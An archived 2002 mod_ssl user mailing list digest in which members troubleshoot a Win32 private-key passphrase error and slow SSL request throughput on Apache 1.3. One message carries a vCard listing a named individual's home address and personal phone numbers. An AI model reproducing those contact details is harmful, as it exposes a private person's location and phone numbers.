Date: Thu, 30 May 2002 18:04:16 -0400
Message-ID: <001c01c20825$f0c2b6e0$0100a8c0@ivivos.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Hsiang" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Recently I got a certicate from one of the CA authority. However, my
SSL.log is giving me an error.  I don't know what did I do wrong can
anyone help me?

[30/May/2002 17:31:16 05760] [info]  Init: Initializing OpenSSL
library[30/May/2002 17:31:16 05760] [info]  Init: Initializing OpenSSL
library
[30/May/2002 17:31:16 05760] [info]  Init: Seeding PRNG with 136 bytes
of entropy
[30/May/2002 17:31:17 05760] [info]  Init: (secure.*****.com:443)
Loading certificate & private key of SSL-aware server
[30/May/2002 17:31:17 05760] [error] Init: PassPhraseDialog BuiltIn not
supported in server private key from file
F:/Apache/Apache2/conf/ssl/secure.key (OpenSSL library error follows)
[30/May/2002 17:31:17 05760] [error] OpenSSL: error:0D084069:asn1
encoding routines:d2i_ASN1_SET:bad tag
[30/May/2002 17:31:17 05760] [error] OpenSSL: error:0D09D082:asn1
encoding routines:d2i_RSAPrivateKey:parsing
[30/May/2002 17:31:17 05760] [error] OpenSSL: error:0D09B00D:asn1
encoding routines:d2i_PrivateKey:ASN1 lib

I am using Apache/2.0.35 (Win32) mod_ssl/2.0.35 OpenSSL/0.9.6c

Chris Hsiang
Intervivos LLC

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 00:11:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA14514; Fri, 31 May 2002 00:10:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id AAA14436; Fri, 31 May 2002 00:10:06 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id F2D514CE698; Fri, 31 May 2002 00:10:05 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id C3D51286E4; Fri, 31 May 2002 00:04:33 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web13609.mail.yahoo.com id WAA09875; Thu, 30 May 2002 22:38:24 +0200 (MET DST)
Message-ID: <20020530203823.99350.qmail@web13609.mail.yahoo.com>
Received: from [65.192.41.225] by web13609.mail.yahoo.com via HTTP; Thu, 30 May 2002 13:38:23 PDT
Date: Thu, 30 May 2002 13:38:23 -0700 (PDT)
From: Patrick Dionisio 
Subject: Performance Tuning on Apache 1.3.24 with mod_ssl 2.8.8
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Patrick Dionisio 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi, I'd like to know what kind of tricks I can apply
to improve the performance of my apache server which
uses mod_ssl.  The OS I'm using is Linux 7.2.

Currently, I have a client script that generates n
number of requests to the apache server.  The page it
requests is a static page.  With SSL turned on, I'm
only able to get at most 7 to 8 requests per second. 
With SSL turned off, I am able to get 50+ requests per
second.

I've tried setting SSLMutex to use sem and
SSLSessionCache to
shm:/usr/local/apache/logs/ssl_gcache_data(512000),
but those changes didn't improve the results.

Any suggestions or ideas?  Thanks.

Patrick





__________________________________________________
Do You Yahoo!?
Yahoo! - Official partner of 2002 FIFA World Cup
http://fifaworldcup.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 00:21:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA16318; Fri, 31 May 2002 00:20:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id AAA16298; Fri, 31 May 2002 00:19:49 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g4UMHdJ07516
	for ; Thu, 30 May 2002 18:17:39 -0400
Date: Thu, 30 May 2002 18:17:39 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: PassPhraseDialog BuiltIn not supported...
In-Reply-To: <001c01c20825$f0c2b6e0$0100a8c0@ivivos.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 30 May 2002, Chris Hsiang wrote:

> [30/May/2002 17:31:17 05760] [error] Init: PassPhraseDialog BuiltIn not
> supported in server private key from file
> F:/Apache/Apache2/conf/ssl/secure.key (OpenSSL library error follows)

It means you can't use SSLPassPhraseDialog BuiltIn on Win32.  Either use
the SSLPassPhraseDialog exec:/path/to/program method or just get rid of
the passphrase.  (I recommend the latter.)

Granted, it's a rather obtuse error message.  I just changed it for
2.0.37.

Hope this helps,
--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 00:28:35 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA16689; Fri, 31 May 2002 00:27:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ivivos.com id AAA16653; Fri, 31 May 2002 00:26:35 +0200 (MET DST)
Received: from elusion [66.57.168.62] by ivivos.com with ESMTP
  (SMTPD32-7.07) id A7501720080; Thu, 30 May 2002 18:27:28 -0400
From: "Chris Hsiang" 
To: 
Subject: RE: PassPhraseDialog BuiltIn not supported...
Date: Thu, 30 May 2002 18:27:28 -0400
Message-ID: <001d01c20829$2e86c220$0100a8c0@ivivos.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_001E_01C20807.A7752220"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Hsiang" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_001E_01C20807.A7752220
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

>>It means you can't use SSLPassPhraseDialog BuiltIn on Win32.  Either
use
>>the SSLPassPhraseDialog exec:/path/to/program method or just get rid
of
>>the passphrase.  (I recommend the latter.)

what exec I can use on win32 to submit the passphrase and also, how do I
get rid of the passphrase from my private key now?

Chris Hsiang
Intervivos LLC




------=_NextPart_000_001E_01C20807.A7752220
Content-Type: text/x-vcard;
	name="Chris Hsiang (chsiang@ivivos.com).vcf"
Content-Disposition: attachment;
	filename="Chris Hsiang (chsiang@ivivos.com).vcf"
Content-Transfer-Encoding: quoted-printable

BEGIN:VCARD
VERSION:2.1
N:Hsiang;Chris;;Mr.
FN:Chris Hsiang (chsiang@ivivos.com)
ORG:Intervivos LLC;IT
TITLE:Programmer
TEL;HOME;VOICE:(803) 776-1547
TEL;CELL;VOICE:(803) 348-7845
TEL;HOME;FAX:(803) 776-1547
ADR;WORK:;Columbia;501 Pelham Dr #C103;Columbia;SC;29209;United States =
of America
LABEL;WORK;ENCODING=3DQUOTED-PRINTABLE:Columbia=3D0D=3D0A501 Pelham Dr =
#C103=3D0D=3D0AColumbia, SC 29209=3D0D=3D0AUnited States=3D
 of America
ADR;HOME:;;501 Pelham Dr #C103;Columbia;SC;29209;United States of =
America
LABEL;HOME;ENCODING=3DQUOTED-PRINTABLE:501 Pelham Dr =
#C103=3D0D=3D0AColumbia, SC 29209=3D0D=3D0AUnited States of America
URL;WORK:http://www.vivospage.com
EMAIL;PREF;INTERNET:chsiang@ivivos.com
REV:20020527T032552Z
END:VCARD

------=_NextPart_000_001E_01C20807.A7752220--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 00:38:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA17337; Fri, 31 May 2002 00:37:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id AAA17317; Fri, 31 May 2002 00:37:11 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g4UMZ1P07806
	for ; Thu, 30 May 2002 18:35:01 -0400
Date: Thu, 30 May 2002 18:35:01 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: RE: PassPhraseDialog BuiltIn not supported...
In-Reply-To: <001d01c20829$2e86c220$0100a8c0@ivivos.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 30 May 2002, Chris Hsiang wrote:

> what exec I can use on win32 to submit the passphrase and also

You'd have to write your own script to do it.  But keep in mind that
protecting the _script_ with the passphrase hardcoded into it is hard, and
even if you manage to do that, there are still problems protecting the key
since the web server has the decrypted private key in-memory after you've
submitted the passphrase.

Whether passphrases are any good or not is a bit of an ongoing heated
debate on this mailing list (AND NO, GUYS, LET'S NOT GO THROUGH THAT AGAIN
PLEASE :-)... just suffice it to say that you should be aware of the
security implications of either choice when deciding how best to protect
your private key.


> how do I get rid of the passphrase from my private key now?

See http://www.modssl.org/docs/2.8/ssl_faq.html#ToC31 .  It's in
unix-speak, but it shouldn't be hard to see what to do.  It's the openssl
command that is the important one... and of course be sure to set the
permissions correctly on the key.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 00:51:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA17894; Fri, 31 May 2002 00:50:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ivivos.com id AAA17882; Fri, 31 May 2002 00:50:04 +0200 (MET DST)
Received: from elusion [66.57.168.62] by ivivos.com with ESMTP
  (SMTPD32-7.07) id ACD11770080; Thu, 30 May 2002 18:50:57 -0400
From: "Chris Hsiang" 
To: 
Subject: RE: PassPhraseDialog BuiltIn not supported...
Date: Thu, 30 May 2002 18:50:57 -0400
Message-ID: <000301c2082c$7642fcc0$0100a8c0@ivivos.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Hsiang" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks it worked.  I have removed the pass phrase and I have absolute no
intention to start another hot debate.  I am still new to MOD_SSL and
Apache 2.0.X

>Whether passphrases are any good or not is a bit of an ongoing heated
>debate on this mailing list (AND NO, GUYS, LET'S NOT GO THROUGH THAT
AGAIN
>PLEASE :-)... just suffice it to say that you should be aware of the
>security implications of either choice when deciding how best to
protect
>your private key.

>> how do I get rid of the passphrase from my private key now?

>See http://www.modssl.org/docs/2.8/ssl_faq.html#ToC31 .  It's in
>unix-speak, but it shouldn't be hard to see what to do.  It's the
openssl
>command that is the important one... and of course be sure to set the
>permissions correctly on the key.

Chris Hsiang
Intervivos LLC

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 01:03:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA18422; Fri, 31 May 2002 01:02:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id BAA18369; Fri, 31 May 2002 01:01:08 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g4UMwwQ07831
	for ; Thu, 30 May 2002 18:58:58 -0400
Date: Thu, 30 May 2002 18:58:58 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Performance Tuning on Apache 1.3.24 with mod_ssl 2.8.8
In-Reply-To: <20020530203823.99350.qmail@web13609.mail.yahoo.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 30 May 2002, Patrick Dionisio wrote:

> Currently, I have a client script that generates n
> number of requests to the apache server.  The page it
> requests is a static page.  With SSL turned on, I'm
> only able to get at most 7 to 8 requests per second.
> With SSL turned off, I am able to get 50+ requests per
> second.

Wow, that's still incredibly slow.  What kind of CPU and how much RAM are
we talking about here?  With SSL turned off you should be able to pump out
way more RPS than that on a static page.  I suggest you tune that first
(you should be looking for a number in the hundreds of RPS at least), and
*then* focus on SSL.  See:

http://httpd.apache.org/docs/misc/perf-tuning.html

Upgrading to Apache 2.0.x might help, too.  :)

> I've tried setting SSLMutex to use sem and
> SSLSessionCache to
> shm:/usr/local/apache/logs/ssl_gcache_data(512000),

shmcb can perform better than shmht under stress (shm == shmht in 1.3, shm
== shmcb in 2.0, though you can explicitly specify either choice in both
versions)... that's probably worth looking into.  See the thread
http://marc.theaimsgroup.com/?l=apache-modssl&m=98529562629436&w=2 for an
explanation of the differences (though some of the information there is
out of date by now, eg shmcb is no longer experimental).

> but those changes didn't improve the results.

It should actually be a rather drastic improvement over other session
cache methods.  I definitely think you need to concentrate on the rest of
Apache first and then come back to looking at SSL tuning.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 08:27:32 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA22222; Fri, 31 May 2002 08:26:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from kaikoura.fel.tno.nl id IAA22195; Fri, 31 May 2002 08:25:38 +0200 (MET DST)
Received: by kaikoura.fel.tno.nl; id IAA14708; Fri, 31 May 2002 08:25:29 +0200 (MET DST)
Received: from fs1.fel.tno.nl(134.203.8.201) by kaikoura.fel.tno.nl via smap (V1.0)
	id xma014583; Fri, 31 May 02 08:25:17 +0200
Received: from pc1928.fel.tno.nl ([134.203.9.113]) by
          fs1.fel.tno.nl (Netscape Messaging Server 4.15) with SMTP id
          GWYPU800.20I for ; Fri, 31 May 2002
          08:25:20 +0200 
Received: FROM fel.tno.nl BY pc1928.fel.tno.nl ; Fri May 31 08:25:18 2002 +0200
Message-ID: <3CF7174E.EAEF8C8B@fel.tno.nl>
Date: Fri, 31 May 2002 08:25:18 +0200
From: "DG Speekenbrink" 
Organization: TNO-FEL
X-Mailer: Mozilla 4.75 [en]C-Netscape2000  (Win95; U)
X-Accept-Language: en,nl,fr,de
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: version compatibility
References: <304CFC651EDCD4118AA800D0B774AFB36F4A2D@hunter.goamerica.net>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "DG Speekenbrink" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is an interesting issue you put to our attention here.

I, for one, consider myself likeley to come to the same point in the
future.
So please post any results/problems you have, and support us all!

Thanks,

Dennis

Shon Stephens wrote:
> 
> i am currently using modssl 2.8.4 w/ apache 1.3.20 and openssl 0.9.6b. for
> compatibility with another application, i need to upgrade my openssl to
> 0.9.6c. will i have any problems with the modssl/apache upgrading to this
> version of openssl. in other words, will i need to upgrade my modssl
> version? should i recompile modssl with the new openssl version, or can i
> just replace what is currently there?
> 
> thanks,
> shon
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 10:54:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA29831; Fri, 31 May 2002 10:53:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id KAA29795; Fri, 31 May 2002 10:52:19 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g4V8per31981
	for ; Fri, 31 May 2002 09:52:01 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 31 May 2002 09:51:37 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F0206715F@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Performance Tuning on Apache 1.3.24 with mod_ssl 2.8.8
Date: Fri, 31 May 2002 09:51:32 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> -----Original Message-----
> From: Cliff Woolley [mailto:jwoolley@apache.org]
> Sent: 30 May 2002 23:59
> To: modssl-users@modssl.org
> Subject: Re: Performance Tuning on Apache 1.3.24 with mod_ssl 2.8.8
> 
> 
> On Thu, 30 May 2002, Patrick Dionisio wrote:
> 
> > Currently, I have a client script that generates n
> > number of requests to the apache server.  The page it
> > requests is a static page.  With SSL turned on, I'm
> > only able to get at most 7 to 8 requests per second.
> > With SSL turned off, I am able to get 50+ requests per
> > second.
> 
> Wow, that's still incredibly slow.  What kind of CPU and how 
> much RAM are
> we talking about here?  With SSL turned off you should be 
> able to pump out
> way more RPS than that on a static page.  I suggest you tune 
> that first
> (you should be looking for a number in the hundreds of RPS at 
> least), and
> *then* focus on SSL.  See:
> 
> http://httpd.apache.org/docs/misc/perf-tuning.html
> 
> Upgrading to Apache 2.0.x might help, too.  :)
> 
Upgrading to Apache 2.0.x on the users platform (I guess it's Red Hat 7.2)
is particularly hard. I spent a week trying this out recently but kept
running into problems with openssl libraries, and pre-compiled packages.

I used both an rpm that had already been built for Apache 2 (after creating
symlinks to the openssl libraries), and compiled openssl and Apache 2 from
source. In both cases I could send one request for a secure page, but all
subsequent requests hung completely.

Until Red Hat can release an rpm that works with their other rpms I'd
suggest that Apache 2 on that platform is still a bit of a pipe-dream. It's
now my preference to stay with pre-compiled packages where-ever I can,
simply because it is easier for me to administer (but I don't want to start
another discussion on that either!)

Which brings me to the point. Are you using the packages that came with
RedHat 7.2, or compiling your own? In the latter case, you may be seeing
conflicts with the openssl libraries that come with Red Hat 7.2. I've had no
difficulties with the packages that come with Red Hat 7.2 thus far.

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

If Charles Darwin knew a fraction of what scientists know today, he'd never
have written the Origin of the Species.

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 11:04:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA00365; Fri, 31 May 2002 11:03:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id LAA00315; Fri, 31 May 2002 11:02:15 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id FAA23520;
	Fri, 31 May 2002 05:01:59 -0400
Date: Fri, 31 May 2002 05:01:59 -0400 (EDT)
From: "R. DuFresne" 
To: John.Airey@rnib.org.uk
cc: modssl-users@modssl.org
Subject: RE: Performance Tuning on Apache 1.3.24 with mod_ssl 2.8.8
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F0206715F@pborolocal.rnib.org.uk>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> (but I don't want to start
> another discussion on that either!)
> 


Dang!  Everyones killing some of my better discussion topics! 

Ya'll have a great weekend folks.

Thanks,


Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 12:55:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA08231; Fri, 31 May 2002 12:54:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from qeo02001.t-online.net id MAA08169; Fri, 31 May 2002 12:53:35 +0200 (MET DST)
Received: from qeo09161.de.t-online.corp (qeo09161 [192.168.248.161])
	by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id MAA20966
	for ; Fri, 31 May 2002 12:03:31 +0200
X-Authentication-Warning: qeo02001.t-online.net: Host qeo09161 [192.168.248.161] claimed to be qeo09161.de.t-online.corp
Received: from qeo00200.de.t-online.corp ([192.168.195.200]) by qeo09161.de.t-online.corp with Microsoft SMTPSVC(5.0.2195.2966);
	 Fri, 31 May 2002 11:56:11 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
Subject: RE: Performance Tuning on Apache 1.3.24 with mod_ssl 2.8.8
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Date: Fri, 31 May 2002 11:55:45 +0200
Message-ID: <60F1F87A64834D45A1EBAE9618305FB86E4151@qeo00200>
Thread-Topic: Performance Tuning on Apache 1.3.24 with mod_ssl 2.8.8
Thread-Index: AcIIJtp1rN8lbr3kSjOkzi8lJOs6UwAWpgRg
From: "Courtin Bert" 
To: 
X-OriginalArrivalTime: 31 May 2002 09:56:11.0171 (UTC) FILETIME=[64A28730:01C20889]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id MAA08217
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Courtin Bert" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

generally speaking: encryption of data (which SSL does in comparison to not using SSL) of course cost computing time. Thats the reason why you'll get less processed requests when using SSL. Thats the price for having secure data transfer, which does not mean that you should consider turning off SSL, depending on which site your're running. 

Secondly, the results you get from your load test of course strongly depend on it's design, but probably turning on the "KeepAlive" directive may improve your results, depending whether your test script supports this.

NB (I): Is your test client software running on the same server? This would downgrade results, too.
NB (II): A sun Netra T1 (UltraSPARC-IIi 440MHz, Memory 512 MB) (a quite low end server) I recently tested processed about 70 requests per second (using SSL).
NB (II): Which hardware are you're using?


Kind regards,
Bert Courtin


-----Original Message-----
From: Patrick Dionisio [mailto:phdionisio@yahoo.com]
Sent: Thursday, May 30, 2002 10:38 PM
To: modssl-users@modssl.org
Subject: Performance Tuning on Apache 1.3.24 with mod_ssl 2.8.8


Hi, I'd like to know what kind of tricks I can apply
to improve the performance of my apache server which
uses mod_ssl.  The OS I'm using is Linux 7.2.

Currently, I have a client script that generates n
number of requests to the apache server.  The page it
requests is a static page.  With SSL turned on, I'm
only able to get at most 7 to 8 requests per second. 
With SSL turned off, I am able to get 50+ requests per
second.

I've tried setting SSLMutex to use sem and
SSLSessionCache to
shm:/usr/local/apache/logs/ssl_gcache_data(512000),
but those changes didn't improve the results.

Any suggestions or ideas?  Thanks.

Patrick





__________________________________________________
Do You Yahoo!?
Yahoo! - Official partner of 2002 FIFA World Cup
http://fifaworldcup.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 20:07:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA09306; Fri, 31 May 2002 20:06:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from falla.videotron.net id UAA09252; Fri, 31 May 2002 20:05:42 +0200 (MET DST)
Received: from betty.localnet ([24.202.164.28])
 by falla.videotron.net (Sun Internet Mail Server sims.3.5.1999.12.14.10.29.p8)
 with ESMTP id <0GWZ00E0WM99NM@falla.videotron.net> for modssl-users@modssl.org; Fri, 31 May 2002 14:05:34 -0400 (EDT)
Received: from localhost ([127.0.0.1] ident=geoff) by betty.localnet with esmtp (Exim 3.35 #1 (Debian))
 id 17DqmL-000094-00; Fri, 31 May 2002 14:05:33 -0400
Date: Fri, 31 May 2002 14:05:33 -0400 (EDT)
From: Geoff Thorpe 
Subject: Re: Performance Tuning on Apache 1.3.24 with mod_ssl 2.8.8
In-reply-to: 
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
Content-type: TEXT/PLAIN; charset=US-ASCII
X-X-Sender: geoff@betty.localnet
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi there,

On Thu, 30 May 2002, Cliff Woolley wrote:

> On Thu, 30 May 2002, Patrick Dionisio wrote:
>
> > Currently, I have a client script that generates n
> > number of requests to the apache server.  The page it
> > requests is a static page.  With SSL turned on, I'm
> > only able to get at most 7 to 8 requests per second.
> > With SSL turned off, I am able to get 50+ requests per
> > second.
>
> Wow, that's still incredibly slow.  What kind of CPU and how much RAM are
> we talking about here?  With SSL turned off you should be able to pump out
> way more RPS than that on a static page.  I suggest you tune that first
> (you should be looking for a number in the hundreds of RPS at least), and
> *then* focus on SSL.  See:

